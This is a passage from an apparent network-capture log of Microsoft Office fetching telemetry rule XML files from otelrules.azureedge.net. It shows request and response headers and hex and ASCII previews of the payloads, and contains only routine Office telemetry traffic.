                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                              ETag: "0x8DC582BDCB4853F"
                                              x-ms-request-id: 432a0cec-a01e-0098-6be6-258556000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134611Z-17c5cb586f6w4mfs5xcmnrny6n00000002200000000091z6
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:11 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              123192.168.2.44987113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:11 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:11 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:11 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1366
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                              ETag: "0x8DC582BDB779FC3"
                                              x-ms-request-id: 16f71f95-f01e-0099-73fb-259171000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134611Z-16849878b788tnsxzb2smucwdc00000009b0000000008n87
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:11 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              124192.168.2.44987213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:11 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:11 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:11 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1397
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                              ETag: "0x8DC582BDFD43C07"
                                              x-ms-request-id: 3bd815fc-c01e-0066-6070-26a1ec000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134611Z-16849878b785f8wh85a0w3ennn000000093g00000000rutb
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              125192.168.2.44987313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:11 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:11 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:11 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1360
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                              ETag: "0x8DC582BDD74D2EC"
                                              x-ms-request-id: 62bbcfe8-a01e-0032-2ffc-241949000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134611Z-r197bdfb6b4hsj5bywyqk9r2xw00000001xg00000000bwh2
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:11 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              126192.168.2.44987413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:11 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:11 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:11 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1427
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                              ETag: "0x8DC582BE56F6873"
                                              x-ms-request-id: 7d0fe5a3-d01e-0049-4537-26e7dc000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134611Z-r197bdfb6b4t7wszkhsu1pyev000000001q0000000002y5f
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:11 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              127192.168.2.44987513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:13 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:13 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:13 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1390
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                              ETag: "0x8DC582BE3002601"
                                              x-ms-request-id: 0426689f-101e-007a-5ef8-25047e000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134613Z-r197bdfb6b42rt68rzg9338g1g00000001v00000000013bu
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:13 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              128192.168.2.44987813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:13 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:13 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:13 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1391
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                              ETag: "0x8DC582BDF58DC7E"
                                              x-ms-request-id: 5342d47f-d01e-0028-2f83-217896000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134613Z-16849878b78p8hrf1se7fucxk800000001b000000000nxrm
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:13 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              129192.168.2.44987713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:13 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:13 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:13 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1364
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                              ETag: "0x8DC582BEB6AD293"
                                              x-ms-request-id: 2f6e7a45-901e-0083-466a-26bb55000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134613Z-16849878b785jrf8dn0d2rczaw00000001w00000000009wa
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:13 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              130192.168.2.44987613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:13 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:13 UTC584INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:13 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1401
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                              ETag: "0x8DC582BE2A9D541"
                                              x-ms-request-id: ee736da1-b01e-001e-7be0-260214000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134613Z-17c5cb586f67p8ffw0hbk5rahw00000002q000000000c8cd
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:13 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              131192.168.2.44987913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:13 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:13 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:13 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1354
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                              ETag: "0x8DC582BE0662D7C"
                                              x-ms-request-id: 0cf7dd75-a01e-003d-3e63-2698d7000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134613Z-16849878b78bcpfn2qf7sm6hsn000000024000000000hese
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:13 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              132192.168.2.44988013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:14 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:14 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:14 GMT
                                              Content-Type: text/xml
                                              Content-Length: 1403
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                              ETag: "0x8DC582BDCDD6400"
                                              x-ms-request-id: fbe9264b-c01e-0046-04f3-242db9000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134614Z-r197bdfb6b48v72xb403uy6hns00000001500000000075f2
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              133192.168.2.44988213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:14 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
